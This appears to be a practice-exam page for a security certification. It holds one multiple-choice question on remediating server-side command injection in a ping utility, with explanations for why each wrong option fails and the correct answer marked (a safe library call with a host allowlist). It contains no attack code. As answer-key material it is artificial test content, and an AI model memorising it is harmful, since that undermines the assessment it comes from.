Trap 1: Keep the current shell command, but add HTML encoding to the…
Output encoding helps prevent browser-side issues, but it does not stop command injection on the server.
Trap 2: Increase the web server timeout so the ping utility has more time…
Timeout tuning does not prevent an attacker from appending extra shell commands to the request.
Trap 3: Require users to authenticate before they can access the page.
Authentication may reduce exposure, but it does not correct the underlying unsafe command execution.
- A
Keep the current shell command, but add HTML encoding to the response page.
Why wrong: Output encoding helps prevent browser-side issues, but it does not stop command injection on the server.
- B
Replace the shell call with a safe library function and strictly allowlist approved host values.
The flaw is server-side command injection caused by passing user input into a shell. A safe library call removes shell interpretation, and an allowlist limits inputs to known-good targets.
- C
Increase the web server timeout so the ping utility has more time to complete.
Why wrong: Timeout tuning does not prevent an attacker from appending extra shell commands to the request.
- D
Require users to authenticate before they can access the page.
Why wrong: Authentication may reduce exposure, but it does not correct the underlying unsafe command execution.
Question Discussion
Share a tip, memory trick, or ask about the reasoning behind this question. Do not post real exam questions, leaked content, braindumps, or copyrighted exam material. Comments are moderated and may be removed without notice.
Sign in to join the discussion.